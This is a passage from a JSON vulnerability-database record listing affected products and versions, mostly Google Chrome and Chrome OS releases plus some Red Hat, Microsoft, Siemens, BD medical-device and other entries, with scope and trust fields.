"25.0.1364.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "58.0.3029.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.28" }, { "model": "tvos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.311" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.693.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.736.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1069.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1668.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1019.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.606.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.438.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.775.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.120" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.209" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.113" }, { "model": "sql server for x64-based systems service pack", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "201610" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1299.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.226" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.869.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.738.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.102" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.231" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.32" }, { "model": "enterprise linux eus compute node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.116" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.13" }, { "model": "sql server for x64-based systems", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "20160" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.578.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.121" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.958.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.380.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.21" }, { "model": "vsphere data protection", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.1.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.809.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.105" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.50" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1681.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.361.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1036.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1018" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.4.154.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.701.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.780.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.116" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.605.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1051.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.49" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.663.0" }, { "model": "pyxis ciisafe -workstation", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.537.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1275.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.133" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.96" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1046.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.122" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1062" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.934.0" }, { "model": "simatic hmi basic panels 2nd generation", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.928.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.490.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1020" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.469.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1080.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.67" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.951.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.130" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.414.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.52" }, { "model": "unified computing system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.332" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.5" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.108" }, { "model": "simatic field pg m4", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.115" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.688.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1050.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.479.0" }, { "model": "pyxis parx handheld", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.960.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.838.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.394.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.41" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.18" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.718.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.503.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.890.1" }, { "model": "kernel", "scope": "eq", "trust": 0.3, "vendor": "linux", "version": "4.14.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1057.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "41.0.2272.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.528.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.25" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1676.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.2491064" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.105" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1023.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.325.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1010.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.724.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.335.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.431.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.498.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.51" }, { "model": "facscalibur", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.612.3" }, { "model": "facscanto 10-color clinical", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.406.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.938.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.515.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1294.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.36" }, { "model": "viper xtr", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.445.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.409.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.775.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.315.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.119" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.54" }, { "model": "enterprise linux for power little endian", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.21" }, { "model": "facsaria i/ii/iii", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.741.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.170.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.588.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.59" }, { "model": "windows server for x64-based systems sp2", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "2008" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1045.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.799.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.511.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.104" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1073.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.152" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.792.0" }, { "model": "pyxis medstation", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "40000" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1667.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.322" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1279.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.169.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.272.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.97" }, { "model": "pyxis medstation", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "35000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.411.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.103" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.47" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.223.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.367.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1016" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1045" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.112" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.106" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.634.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.454.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1029.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.466.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.337.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.507.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1032" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1302.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.118" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.827.0" }, { "model": "lsrfortessa", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.642.2" }, 